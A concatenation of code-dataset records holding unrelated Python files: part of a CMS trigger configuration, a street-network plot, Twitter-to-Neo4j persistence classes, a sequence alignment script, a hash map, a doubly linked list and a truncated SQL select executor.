HLTEndSequence )\nHLT_Dimuon0_Jpsi_Muon_v7 = cms.Path( HLTBeginSequence + hltL1sL1TripleMu0 + hltPreDimuon0JpsiMuon + hltTripleMuonL1Filtered0 + HLTL2muonrecoSequence + hltTripleMuonL2PreFiltered0 + HLTL3muonrecoSequence + hltTripleMuL3PreFiltered0 + hltJpsiMuonL3Filtered + hltDisplacedmumuVtxProducerJpsiMuon + hltVertexmumuFilterJpsiMuon + HLTEndSequence )\nHLT_Dimuon0_Upsilon_Muon_v7 = cms.Path( HLTBeginSequence + hltL1sL1TripleMu0 + hltPreDimuon0UpsilonMuon + hltTripleMuonL1Filtered0 + HLTL2muonrecoSequence + hltTripleMuonL2PreFiltered0 + HLTL3muonrecoSequence + hltTripleMuL3PreFiltered0 + hltUpsilonMuonL3Filtered + hltDisplacedmumuVtxProducerUpsilonMuon + hltVertexmumuFilterUpsilonMuon + HLTEndSequence )\nHLT_Mu5_L2Mu2_Jpsi_v9 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreMu5L2Mu2Jpsi + hltMu5L2Mu2L1Filtered0 + HLTL2muonrecoSequence + hltMu5L2Mu2L2PreFiltered0 + HLTL3muonrecoSequence + hltMu5L2Mu2L3Filtered5 + hltMu5L2Mu2JpsiTrackMassFiltered + HLTEndSequence )\nHLT_Mu5_Track2_Jpsi_v9 = cms.Path( HLTBeginSequence + hltL1sL1SingleMu3 + hltPreMu5Track2Jpsi + hltMu5TrackJpsiL1Filtered0 + HLTL2muonrecoSequence + hltMu5TrackJpsiL2Filtered3 + HLTL3muonrecoSequence + hltMu5TrackJpsiL3Filtered3 + HLTMuTrackJpsiPixelRecoSequence + hltMu5Track1JpsiPixelMassFiltered + HLTMuTrackJpsiTrackRecoSequence + hltMu5Track2JpsiTrackMassFiltered + HLTEndSequence )\nHLT_Mu7_Track7_Jpsi_v10 = cms.Path( HLTBeginSequence + hltL1sL1SingleMu7 + hltPreMu7Track7Jpsi + hltMu7TrackJpsiL1Filtered0 + HLTL2muonrecoSequence + hltMu7TrackJpsiL2Filtered3 + HLTL3muonrecoSequence + hltMu7TrackJpsiL3Filtered3 + HLTMuTrackJpsiPixelRecoSequence + hltMu7Track6JpsiPixelMassFiltered + HLTMuTrackJpsiTrackRecoSequence + hltMu7Track7JpsiTrackMassFiltered + HLTEndSequence )\nHLTriggerFinalPath = cms.Path( hltGtDigis + hltScalersRawToDigi + hltFEDSelector + hltTriggerSummaryAOD + hltTriggerSummaryRAW )\n\n\nHLTSchedule = cms.Schedule( *(HLT_DoubleMu4_Jpsi_Displaced_v1, HLT_DoubleMu5_Jpsi_Displaced_v1, HLT_DoubleMu5_Jpsi_Displaced_v2, HLT_DoubleMu4_Dimuon4_Bs_Barrel_v1, HLT_DoubleMu4_Dimuon6_Bs_v1, HLT_DoubleMu4p5_LowMass_Displaced_v1, HLT_DoubleMu5_LowMass_Displaced_v1, HLT_Dimuon0_Jpsi_v6, HLT_Dimuon0_Jpsi_NoVertexing_v3, HLT_Dimuon0_Upsilon_v6, HLT_Dimuon6_LowMass_v1, HLT_Dimuon7_Upsilon_Barrel_v1, HLT_Dimuon9_Upsilon_Barrel_v1, HLT_Dimuon9_PsiPrime_v1, HLT_Dimuon10_Jpsi_Barrel_v6, HLT_Dimuon11_PsiPrime_v1, HLT_Dimuon13_Jpsi_Barrel_v1, HLT_Dimuon0_Jpsi_Muon_v7, HLT_Dimuon0_Upsilon_Muon_v7, HLT_Mu5_L2Mu2_Jpsi_v9, HLT_Mu5_Track2_Jpsi_v9, HLT_Mu7_Track7_Jpsi_v10, HLTriggerFinalPath ))\n\n# remove the HLT prescales\nif 'PrescaleService' in locals():\n PrescaleService.lvl1DefaultLabel = cms.untracked.string( '0' )\n PrescaleService.lvl1Labels = cms.vstring( '0', '1', '2', '3', '4', '5', '6', '7', '8', '9' )\n PrescaleService.prescaleTable = cms.VPSet( )\n\n# En-able HF Noise filters in GRun menu\nif 'hltHfreco' in locals():\n hltHfreco.setNoiseFlags = cms.bool( True )\n\n# version specific customizations\nimport os\ncmsswVersion = os.environ['CMSSW_VERSION']\n\n# from CMSSW_4_4_0 / CMSSW_5_0_0_pre1: change input label for V00-04-17-00 RecoVertex/BeamSpotProducer\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltOnlineBeamSpot' in locals():\n hltOnlineBeamSpot.src = hltOnlineBeamSpot.label\n del hltOnlineBeamSpot.label\n\n# from CMSSW_4_4_0_pre8: update HF configuration for V00-09-18 RecoLocalCalo/HcalRecProducers\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltHfreco' in locals():\n hltHfreco.digiTimeFromDB = cms.bool( False )\n hltHfreco.digistat.HFdigiflagCoef = cms.vdouble(\n hltHfreco.digistat.HFdigiflagCoef0.value(),\n hltHfreco.digistat.HFdigiflagCoef1.value(),\n hltHfreco.digistat.HFdigiflagCoef2.value()\n )\n del hltHfreco.digistat.HFdigiflagCoef0\n del hltHfreco.digistat.HFdigiflagCoef1\n del hltHfreco.digistat.HFdigiflagCoef2\n\n# from CMSSW_4_4_0_pre6: updated configuration for the HybridClusterProducer's and EgammaHLTHybridClusterProducer's\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltHybridSuperClustersActivity' in locals():\n hltHybridSuperClustersActivity.xi = cms.double( 0.0 )\n hltHybridSuperClustersActivity.useEtForXi = cms.bool( False )\n if 'hltHybridSuperClustersL1Isolated' in locals():\n hltHybridSuperClustersL1Isolated.xi = cms.double( 0.0 )\n hltHybridSuperClustersL1Isolated.useEtForXi = cms.bool( False )\n if 'hltHybridSuperClustersL1NonIsolated' in locals():\n hltHybridSuperClustersL1NonIsolated.xi = cms.double( 0.0 )\n hltHybridSuperClustersL1NonIsolated.useEtForXi = cms.bool( False )\n\n# from CMSSW_4_4_0_pre5: updated configuration for the PFRecoTauDiscriminationByIsolation producers\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltPFTauTightIsoIsolationDiscriminator' in locals():\n hltPFTauTightIsoIsolationDiscriminator.qualityCuts.primaryVertexSrc = hltPFTauTightIsoIsolationDiscriminator.PVProducer\n hltPFTauTightIsoIsolationDiscriminator.qualityCuts.pvFindingAlgo = cms.string('highestPtInEvent')\n del hltPFTauTightIsoIsolationDiscriminator.PVProducer\n if 'hltPFTauLooseIsolationDiscriminator' in locals():\n hltPFTauLooseIsolationDiscriminator.qualityCuts.primaryVertexSrc = hltPFTauLooseIsolationDiscriminator.PVProducer\n hltPFTauLooseIsolationDiscriminator.qualityCuts.pvFindingAlgo = cms.string('highestPtInEvent')\n del hltPFTauLooseIsolationDiscriminator.PVProducer\n\n# from CMSSW_4_4_0_pre5: updated configuration for the EcalSeverityLevelESProducer\nif cmsswVersion > \"CMSSW_4_4\":\n ecalSeverityLevel = cms.ESProducer(\"EcalSeverityLevelESProducer\",\n appendToDataLabel = cms.string(''),\n dbstatusMask=cms.PSet(\n kGood = cms.vuint32(0),\n kProblematic = cms.vuint32(1, 2, 3, 4, 5, 6, 7, 8, 9, 10),\n kRecovered = cms.vuint32(),\n kTime = cms.vuint32(),\n kWeird = cms.vuint32(),\n kBad = cms.vuint32(11, 12, 13, 14, 15, 16)\n ),\n flagMask = cms.PSet (\n kGood = cms.vstring('kGood'),\n kProblematic = cms.vstring('kPoorReco', 'kPoorCalib', 'kNoisy', 'kSaturated'),\n kRecovered = cms.vstring('kLeadingEdgeRecovered', 'kTowerRecovered'),\n kTime = cms.vstring('kOutOfTime'),\n kWeird = cms.vstring('kWeird', 'kDiWeird'),\n kBad = cms.vstring('kFaultyHardware', 'kDead', 'kKilled')\n ),\n timeThresh = cms.double(2.0)\n )\n\n# from CMSSW_4_3_0_pre6: ECAL severity flags migration\nif cmsswVersion > \"CMSSW_4_3\":\n import HLTrigger.Configuration.Tools.updateEcalSeverityFlags\n HLTrigger.Configuration.Tools.updateEcalSeverityFlags.update( locals() )\n\n","sub_path":"python/HLT_3e33_cff.py","file_name":"HLT_3e33_cff.py","file_ext":"py","file_size_in_byte":220413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399112134","text":"import matplotlib.pyplot as plt\nimport osmnx as ox\nfrom descartes import PolygonPatch\nfrom shapely.geometry import Polygon, MultiPolygon\nox.config(log_console=True, use_cache=True)\nox.__version__\n\n\n\n\n# get the place shape\n#gdf = ox.gdf_from_place('Portland, Maine')\ngdf = ox.project_gdf(gdf)\n\n# get the street network, with retain_all=True to retain all the disconnected islands' networks\nG = ox.graph_from_place('Portland, Maine', network_type='drive', retain_all=True)\nG = ox.project_graph(G)\n\nfig, ax = ox.plot_graph(G, fig_height=10, show=False, close=False, edge_color='#777777')\nplt.show()\n\nplt.close()\n\n\n\n# to this matplotlib axis, add the place shape as descartes polygon patches\nfor geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fc='#cccccc', ec='k', linewidth=3, alpha=0.1, zorder=-1)\n ax.add_patch(patch)\n\n\n# optionally set up the axes extents all nicely\nmargin = 0.02\nwest, south, east, north = gdf.unary_union.bounds\nmargin_ns = (north - south) * margin\nmargin_ew = (east - west) * margin\nax.set_ylim((south - margin_ns, north + margin_ns))\nax.set_xlim((west - margin_ew, east + margin_ew))\nplt.show()\n\nprint('hi')","sub_path":"jon_insight_project/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"294363422","text":"from py2neo import Relationship\n\nfrom settings import *\n\n\nclass TwitterUser(dict):\n\n def persist_twitter_user(self, database_name):\n if (database_name == 'mongo'):\n db_tweet.users.replace_one({'id': self['id']}, self, upsert=True)\n elif (database_name == 'neo'):\n user = graph.merge_one(\"Twitter_User\", \"id\", self['id'])\n for key in self:\n user[key] = self[key]\n user.push()\n tweet_node = graph.find_one(\"Tweet\", \"id\", self['tweet_id'])\n\n user_tweeted = Relationship(user, \"TWEETED\", tweet_node)\n graph.create_unique(user_tweeted)\n\n\n\n\nclass Tweet(dict):\n def persist_tweet(self, database_name, tweet_type):\n if (database_name == 'mongo'):\n db_tweet.tweets.replace_one({'id': self['id']}, self, upsert=True)\n elif (database_name == 'neo'):\n tweet_node = graph.merge_one(\"Tweet\", \"id\", self['id'])\n for key in self:\n tweet_node[key] = self[key]\n tweet_node.push()\n\n if tweet_type == 'search':\n tweets_node = graph.find_one(\"Search\", \"name\", \"SEARCH\")\n tweets_has_search_tweet = Relationship(tweets_node, \"HAS\", tweet_node)\n graph.create_unique(tweets_has_search_tweet)\n elif tweet_type == 'stream':\n tweets_node = graph.find_one(\"Stream\", \"name\", \"STREAM\")\n tweets_has_stream_tweet = Relationship(tweets_node, \"HAS\", tweet_node)\n graph.create_unique(tweets_has_stream_tweet)\n\n photos_node = graph.merge_one(\"Photos\", \"tweet_id\", self['id'])\n photos_node['name'] = \"Photos\"\n photos_node.push()\n tweet_has_photos = Relationship(tweet_node, \"HAS\", photos_node)\n graph.create_unique(tweet_has_photos)\n\n\n urls_node = graph.merge_one(\"Urls\", \"tweet_id\", self['id'])\n urls_node['name'] = \"Urls\"\n urls_node.push()\n tweet_has_urls = Relationship(tweet_node, \"HAS\", urls_node)\n graph.create_unique(tweet_has_urls)\n\n\n\n hashtags_node = graph.merge_one(\"Hashtags\", \"tweet_id\", self['id'])\n hashtags_node['name'] = \"Hashtags\"\n hashtags_node.push()\n tweet_has_hashtags = Relationship(tweet_node, \"HAS\", hashtags_node)\n graph.create_unique(tweet_has_hashtags)\n\n\n user_mentions_node = graph.merge_one(\"User_mentions\", \"tweet_id\", self['id'])\n\n user_mentions_node['name'] = \"User_mentions\"\n user_mentions_node.push()\n tweet_has_user_mentions = Relationship(tweet_node, \"HAS\", user_mentions_node)\n graph.create_unique(tweet_has_user_mentions)\n\n\n\nclass Photo(dict):\n\n def persist_photo(self):\n photo = graph.merge_one(\"Photo\", \"tweet_id\", self['tweet_id'])\n for key in self:\n photo[key] = self[key]\n photo.push()\n\n photos_node = graph.find_one(\"Photos\", \"tweet_id\", self['tweet_id'])\n photos_has_photo = Relationship(photos_node, \"HAS\", photo)\n graph.create_unique(photos_has_photo)\n\n\nclass Url(dict):\n def persist_Url(self):\n url = graph.merge_one(\"Url\", \"tweet_id\", self['tweet_id'])\n for key in self:\n url[key] = self[key]\n url.push()\n\n urls_node = graph.find_one(\"Urls\", \"tweet_id\", self['tweet_id'])\n urls_has_url = Relationship(urls_node, \"HAS\", url)\n graph.create_unique(urls_has_url)\n\n\n\nclass Hashtag(dict):\n def persist_Hashtag(self):\n ht = graph.merge_one(\"Hashtag\", \"tweet_id\", self['tweet_id'])\n for key in self:\n ht[key] = self[key]\n ht.push()\n\n hashtags_node = graph.find_one(\"Hashtags\", \"tweet_id\", self['tweet_id'])\n hashtags_has_hashtag = Relationship(hashtags_node, \"HAS\", ht)\n graph.create_unique(hashtags_has_hashtag)\n\nclass UserMention(dict):\n def persist_UserMention(self):\n um = graph.merge_one(\"UserMention\", \"tweet_id\", self['tweet_id'])\n for key in self:\n um[key] = self[key]\n um.push()\n\n\n user_mentions_node = graph.find_one(\"User_mentions\", \"tweet_id\", self['tweet_id'])\n\n user_mentions_has_user_mention = Relationship(user_mentions_node, \"HAS\", um)\n graph.create_unique(user_mentions_has_user_mention)","sub_path":"SN-Extractor/Twitter/twitter_entities.py","file_name":"twitter_entities.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"188394814","text":"#Solution is based off of the Needleman-Wunsch Algorithm. https://en.wikipedia.org/wiki/Needleman%E2%80%93Wunsch_algorithm\n\n#Imports\nfrom sys import argv;\n\n#read in the data from a file\nfilename = argv[1];\ninfile = open(filename, 'r');\ndataset = infile.readlines();\ninfile.close();\n\nstr1 = dataset[0].rstrip(\"\\n\");\nstr2 = dataset[1].rstrip(\"\\n\");\n\n#Create a 2-dimensional array. Need to do len + 1 because of how python does in range\ngrid = [[None for i in range(len(str1) + 1)] for j in range(len(str2) + 1)];\n\n#Create a dictionary of scores\nscores = {\n\t\"TT\": 20,\n\t\"TC\": 10,\n\t\"TA\": 5,\n\t\"TG\": 5,\n\t\"T-\": -5,\n\n\t\"CT\": 10,\n\t\"CC\": 20,\n\t\"CA\": 5,\n\t\"CG\": 5,\n\t\"C-\": -5,\n\n\t\"AT\": 5,\n\t\"AC\": 5,\n\t\"AA\": 20,\n\t\"AG\": 10,\n\t\"A-\": -5,\n\n\t\"GT\": 5,\n\t\"GC\": 5,\n\t\"GA\": 10,\n\t\"GG\": 20,\n\t\"G-\": -5,\n\n\t\"-T\": -5,\n\t\"-C\": -5,\n\t\"-A\": -5,\n\t\"-G\": -5\n};\n\n#Function to trace the paths\ndef tracePaths(i, j, seq1, seq2, gridVal):\n\t#Get what the scored would have been\n\tdiagonal = grid[j - 1][i - 1] + scores[str2[j - 1] + str1[i - 1]];\n\tbehind = grid[j][i - 1] + scores[str2[j - 1] + \"-\"];\n\tabove = grid[j - 1][i] + scores[\"-\" + str1[i - 1]];\n\n\t#Top corner was hit\n\tif(i == 0 and j == 0):\n\t\tprint(seq1);\n\t\tprint(seq2);\n\t\treturn;\n\n\t#At the left most col \n\tif(i == 0):\n\t\twhile(j != 0):\t\t\t\n\t\t\tseq1 = \"-{0}\".format(seq1);\n\t\t\tseq2 = \"{0}{1}\".format(str2[j - 1], seq2);\n\t\t\tj -= 1;\n\t\tprint(\"-{0}\".format(seq1));\n\t\tprint(seq2);\n\t\treturn;\t\t\n\n\t#At the top row\n\tif(j == 0):\n\t\twhile(i != 0):\n\t\t\tseq1 = \"{0}{1}\".format(str1[i - 1], seq1);\n\t\t\tseq2 = \"-{0}\".format(str2);\t\t\n\t\t\ti -= 1;\n\t\tprint(seq1);\n\t\tprint(\"-{0}\".format(seq2));\n\t\treturn;\n\n\t#Trace diagonally\n\tif(gridVal == diagonal):\t\t\n\t\ttracePaths(i - 1, j - 1, \"{0}{1}\".format(str1[i - 1], seq1), \"{0}{1}\".format(str2[j - 1], seq2), grid[j - 1][i - 1]);\n\n\t#Trace left\n\tif(gridVal == behind):\n\t\ttracePaths(i, j - 1, \"-{0}\".format(seq1), \"{0}{1}\".format(str2[j - 1], seq2), grid[j][i - 1]);\n\n\t#trace up\n\tif(gridVal == above):\n\t\ttracePaths(i - 1, j, \"{0}{1}\".format(str1[i - 1], seq1), \"-{0}\".format(seq2), grid[j - 1][i]);\n#End function definition\n\n#Set the gap value\ngapVal = -5;\n\n#Set the first row\nfor i in range(len(str1) + 1):\n\tgrid[0][i] = i * gapVal;\n\n#Set the first column\nfor j in range(0, len(str2) + 1):\n\tgrid[j][0] = j * gapVal;\n\n#Fill in the grid\nfor i in range(1, len(str2) + 1):\n\tfor j in range(1, len(str1) + 1):\n\t\tdiagonal = grid[i - 1][j - 1] + scores[str2[i - 1] + str1[j - 1]];\n\t\tbehind = grid[i][j - 1] + scores[str2[i - 1] + \"-\"];\n\t\tabove = grid[i - 1][j] + scores[\"-\" + str1[j - 1]];\t\t\n\t\tgrid[i][j] = max(diagonal, above, behind);\n\n#Call the function to trace the paths\ntracePaths(len(str1), len(str2), \"\", \"\", grid[len(str2)][len(str1)]);","sub_path":"p2/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"183229636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 15 20:18:04 2018\n\n@author: yahia\n\"\"\"\n \nfrom Node import Node\n \nclass Hash_map_Quadratic_Probing(object):\n def __init__(self,slots = 13):\n self.array = [Node(None)] * slots\n self.numberofelements = 0\n self.length = slots\n \n def Hash_Function(self,number,i):\n return ((number + 3 + 5*i + 7*(i**2)) % self.length)\n \n def insert(self,number):\n self.numberofelements+=1\n i = 0\n key = self.Hash_Function(number,i)\n NewNumb = Node(number)\n NewNumb.key = key\n while(self.array[key].data is not None and not self.array[key].dead):\n if(self.array[key].key != NewNumb.key):\n raise NameError('Table is Full')\n i+=1\n key = self.Hash_Function(number,i)\n self.array[key] = NewNumb\n \n def Delete(self,Number):\n i = 0\n key = self.Hash_Function(Number,i)\n nodeatkey = self.array[key]\n while(nodeatkey.data != Number and i != self.length):\n i+=1\n key = self.Hash_Function(Number,i)\n nodeatkey = self.array[key]\n if i == self.length:\n raise NameError('Value isnt in table')\n if(self.array[key].dead):\n raise NameError('Value is already dead')\n\n self.array[key].dead = True\n\n \n def printHashMap(self):\n for index in range(self.length):\n print(\"Slot #\" + str(index) + \" : \", end=\"\")\n print(self.array[index].data)\n \n \nmyhashmap = Hash_map_Quadratic_Probing()\nmyhashmap.insert(2243)\nmyhashmap.insert(2343)\nmyhashmap.insert(2343)\nmyhashmap.insert(2343)\n\n\n\n\n\nmyhashmap.printHashMap()\n\n\n\n\n\n \n ","sub_path":"Data_Structures/Quadratic_Probing_Hashmap/Quadratic_Probing_Hashmap.py","file_name":"Quadratic_Probing_Hashmap.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"45892971","text":"class Node:\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.prev = None\n\t\tself.next = None\n\n\tdef __str__(self):\n\t\treturn \"data->{}\".format(self.data)\n\nclass DoublyLinkedList:\n\tdef __init__(self):\n\t\tself.head = None\n\n\tdef add_last(self, data):\n\t\tn = Node(data)\n\t\tif self.head == None:\n\t\t\tself.head = n\n\t\telse:\n\t\t\tp = self.head\n\t\t\twhile p.next != None:\n\t\t\t\tp = p.next\n\t\t\tn.prev = p\n\t\t\tp.next = n\n\n\tdef add_first(self,data):\n\t\tn = Node(data)\n\t\tif self.head == None:\n\t\t\tself.head = None\n\t\telse:\n\t\t\tn.next = self.head\n\n\tdef list_to_dll(self, l):\n\t\tif self.head != None:\n\t\t\traise Exception(\"you cannot create dll\")\n\t\telse:\n\t\t\tfor i in l:\n\t\t\t\tself.add_last(i)\n\n\n\n\n\n\tdef display(self):\n\t\tif self.head == None:\n\t\t\tprint(\"Empty\")\n\t\telse:\n\t\t\tp = self.head\n\t\t\tc = 1\n\t\t\twhile p:\n\t\t\t\t# print(f\"head value->{self.head.data} and node value is {p.data}\")\n\t\t\t\tprint(f\"{c}th node is {p.data}\")\n\t\t\t\tp = p.next\n\t\t\t\tc+=1\n\n\tdef size_dll(self):\n\t\tif self.head == None:\n\t\t\treturn 0\n\t\telse:\n\t\t\tp = self.head\n\t\t\tcount = 0\n\t\t\twhile p:\n\t\t\t\tp = p.next\n\t\t\t\tcount += 1\n\t\t\treturn count\n\n\n\n\tdef delete_node(self, index):\n\t\t#index starts from 0\n\t\tif self.head == None:\n\t\t\traise Exception(\"List is Empty, you cannot delete Node\")\n\t\telse:\n\t\t\tif self.size_dll() <= index:\n\t\t\t\traise Exception(\"check your index and size of dll\")\n\t\t\telse:\n\t\t\t\tif index == 0:\n\t\t\t\t\ttemp = self.head.data\n\t\t\t\t\tself.head.next.prev = self.head\n\t\t\t\t\tself.head = self.head.next\n\t\t\t\t\treturn temp\n\t\t\t\telif index == (self.size_dll()-1):\n\t\t\t\t\tp = self.head\n\t\t\t\t\tq = None\n\t\t\t\t\twhile p.next != None:\n\t\t\t\t\t\tq = p\n\t\t\t\t\t\tp = p.next\n\t\t\t\t\tq.next = None\n\n\t\t\t\telse:\n\t\t\t\t\tp = self.head\n\t\t\t\t\tq = None\n\t\t\t\t\tfor i in range(index):\n\t\t\t\t\t\tq = p\n\t\t\t\t\t\tp = p.next\n\t\t\t\t\ttemp = p.data\n\t\t\t\t\tp.next.prev = q\n\t\t\t\t\tq.next = p.next\n\t\t\t\t\treturn temp\n\n\tdef delete_last_node(self):\n\t\ttry:\n\t\t\tif self.head == None:\n\t\t\t\traise Exception(\"No element to delete\")\n\t\t\telse: \t\t\n\t\t\t\tp = self.head\n\t\t\t\twhile p.next != None:\n\t\t\t\t\tp = p.next\n\t\t\t\tp.prev.next = None\n\t\texcept Exception as e:\n\t\t\tprint(\"you cannot delete element from an empty dll\")\n\n\tdef delete_first_node(self):\n\t\tif self.head == None:\n\t\t\tprint(\"list is empty\")\n\t\telse:\n\t\t\tself.head = self.head.next\n\n\n\n\n\n\n\n\n\n\ndll = DoublyLinkedList()\n\ndll.list_to_dll([23,53,98,32,748,99,33])\n\ndll.display()\nprint(\"\\n\")\ndll.delete_first_node()\n# print(dll.size_dll())\n# print(\"after\")\ndll.display()\n# print(\"\\n\")\n# dll.delete_node(1)\n# dll.display()\n\n\n\n","sub_path":"doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"8149143","text":"from abstract.instruccion import *\nfrom tools.tabla_tipos import *\nfrom tools.console_text import *\nfrom tools.tabla_simbolos import *\nfrom error.errores import *\nfrom abstract.retorno import *\nfrom prettytable import PrettyTable\nfrom abstract.columnaID import*\nfrom storage import jsonMode as funciones\nfrom instruccion.alias_item import *\nimport operator\n\nclass select_normal(instruccion):\n def __init__(self,distinto, lista_cols, list_tables, donde, groupby, orderby, having, limite, line, column, num_nodo):\n super().__init__(line,column)\n self.distinto=distinto\n self.lista_cols = lista_cols\n self.list_tables = list_tables\n self.donde = donde\n self.groupby = groupby\n self.orderby = orderby\n self.having = having\n self.limite = limite\n\n #AST\n self.nodo = nodo_AST('SELECT',num_nodo)\n self.nodo.hijos.append(nodo_AST('SELECT',num_nodo+1))\n\n if distinto!=None:\n\n self.nodo.hijos.append(nodo_AST('DISTINCT', num_nodo + 2))\n if lista_cols != '*':\n for lista in lista_cols:\n self.nodo.hijos.append(lista.nodo)\n else:\n self.nodo.hijos.append(nodo_AST('*', num_nodo + 3))\n\n self.nodo.hijos.append(nodo_AST('FROM', num_nodo + 4))\n\n self.nodo.hijos.append(nodo_AST(str(list_tables), num_nodo + 5))\n\n if donde != None:\n self.nodo.hijos.append(donde.nodo)\n\n if groupby != None:\n self.nodo.hijos.append(groupby.nodo)\n\n if orderby != None:\n self.nodo.hijos.append(orderby.nodo)\n\n if having != None:\n self.nodo.hijos.append(having.nodo)\n\n if limite != None:\n self.nodo.hijos.append(limite.nodo)\n\n else:\n\n if lista_cols != '*':\n for lista in lista_cols:\n self.nodo.hijos.append(lista.nodo)\n else:\n self.nodo.hijos.append(nodo_AST('*', num_nodo + 2))\n\n self.nodo.hijos.append(nodo_AST('FROM', num_nodo + 3))\n\n self.nodo.hijos.append(nodo_AST(str(list_tables), num_nodo + 4))\n\n if donde != None:\n self.nodo.hijos.append(donde.nodo)\n\n if groupby != None:\n self.nodo.hijos.append(groupby.nodo)\n\n if orderby != None:\n self.nodo.hijos.append(orderby.nodo)\n\n if having != None:\n self.nodo.hijos.append(having.nodo)\n\n if limite != None:\n self.nodo.hijos.append(limite.nodo)\n\n #Gramatica\n self.grammar_ = '| seleccionar ::= SELECT distinto select_list FROM list_id donde group_by order_by group_having limite; | seleccionar = new select_normal(); |
\\n'\n\n if distinto!=None:\n self.grammar_ += '| distinto ::= DISTINCT | distinto = new distinto(); |
\\n'\n if lista_cols != '*':\n self.grammar_ += '| select_list ::= expressiones | select_list = new select_list(); |
\\n'\n self.grammar_ += lista.grammar_\n\n else:\n self.grammar_ += '| select_list ::= * | distinto = new distinto(); |
\\n'\n\n self.grammar_ += '| list_id ::= list_id , alias | list_id = lista.append(id); |
\\n'\n self.grammar_ += '| list_id ::= list_id | list_id = lista[]; |
\\n'\n self.grammar_ += '| alias ::= ID | alias = ID.value; |
\\n'\n\n if donde != None:\n self.grammar_ += donde.grammar_\n\n if groupby != None:\n self.grammar_ += groupby.grammar_\n\n if orderby != None:\n self.grammar_ += orderby.grammar_\n\n if having != None:\n self.grammar_ += having.grammar_\n\n if limite != None:\n self.grammar_ += limite.grammar_\n\n else:\n\n if lista_cols != '*':\n self.grammar_ += '| select_list ::= expressiones | select_list = new select_list(); |
\\n'\n self.grammar_ += lista.grammar_\n\n else:\n self.grammar_ += '| select_list ::= * | distinto = new distinto(); |
\\n'\n\n self.grammar_ += '| list_id ::= list_id , alias | list_id = lista.append(id); |
\\n'\n self.grammar_ += '| list_id ::= list_id | list_id = lista[]; |
\\n'\n self.grammar_ += '| alias ::= ID | alias = ID.value; |
\\n'\n\n if donde != None:\n self.grammar_ += donde.grammar_\n\n if groupby != None:\n self.grammar_ += groupby.grammar_\n\n if orderby != None:\n self.grammar_ += orderby.grammar_\n\n if having != None:\n self.grammar_ += having.grammar_\n\n if limite != None:\n self.grammar_ += limite.grammar_\n\n def ejecutar(self, imprimir=None):\n try:\n for id_item in self.list_tables:\n if isinstance(id_item, alias_item):\n id_item.ejecutar([])\n\n id_db = get_actual_use()\n salidaTabla = PrettyTable()\n encabezados=[]\n\n registro = []\n registro_aux = []\n\n if self.donde == None:\n for tabla in self.list_tables:\n data_table = funciones.extractTable(id_db,tabla)\n registro=data_table\n encabezados=ts.field_names(id_db,tabla)\n #si viene where\n else:\n data_were = self.donde.ejecutar(self.list_tables)\n print(data_were)\n if data_were.tipo != tipo_primitivo.ERROR:\n encabezados = data_were.encabezados\n registro=data_were.valor\n else:\n errores.append(nodo_error(self.line, self.column, 'ERROR - No se pudo ejecutar select', 'Semántico'))\n add_text('ERROR - No se pudo ejecutar select\\n')\n\n #Si viene GroupBy\n\n if self.groupby != None:\n lista_groupBy = self.groupby.ejecutar()\n print(str(lista_groupBy))\n index_G = self.retornador_index(lista_groupBy[0],encabezados)\n print(str(index_G))\n\n registro_columnas = []\n\n for busqueda in registro:\n\n contador_aux = 0\n\n\n for aux in busqueda:\n\n if index_G == contador_aux:\n if self.existencia_grupby(busqueda,registro_columnas,index_G):\n registro_columnas.append(busqueda)\n\n contador_aux += 1\n print(registro_columnas)\n registro=registro_columnas\n\n #Si viene OrderBy\n if self.orderby != None:\n auxOrder_by = self.orderby.ejecutar()\n indexG=self.retornador_index(auxOrder_by.valor[0],encabezados)\n\n if auxOrder_by.tipo == 'ASC':\n registro = sorted(registro, key=lambda i: str(i[indexG]).lower())\n elif auxOrder_by.tipo == 'DESC':\n registro = sorted(registro, key=lambda i: str(i[indexG]).lower(), reverse=True)\n\n if self.lista_cols != '*':\n listCampos2 = []\n auxEncabezados=[]\n for col in self.lista_cols:\n contador = -1\n for campo in encabezados:\n listCampos2.clear()\n contador += 1\n if (col.valor == campo):\n auxEncabezados.append(col.valor)\n aux = columnaId([],col.valor)\n for col2 in registro:\n listCampos2.append(col2[contador])\n aux.lista.append(col2[contador])\n salidaTabla.add_column(campo, listCampos2)\n registro_aux.append(aux)\n registro=self.metodo_sis(registro_aux)\n encabezados=auxEncabezados\n else:\n salidaTabla.field_names = encabezados\n if len(registro) > 0:\n salidaTabla.add_rows(registro)\n\n if self.distinto != None:\n salidaTabla.clear()\n mostrar = []\n aux1 = registro\n for n in registro:\n if self.metodo_Pegre(n, aux1) == 1:\n mostrar.append(n)\n print(n)\n else:\n cont = 0\n for reco in mostrar:\n\n if n == reco:\n cont = 2\n break\n else:\n cont =1\n\n if cont == 1:\n mostrar.append(n)\n registro=mostrar\n salidaTabla.add_rows(mostrar)\n\n\n if imprimir==None :\n add_text('\\n')\n add_text(salidaTabla)\n add_text('\\n')\n\n return retorno(registro[0][0],encabezados,registro)\n except:\n add_text(\"E-22005 error in assignment: the query could not be made.\\n\")\n\n def 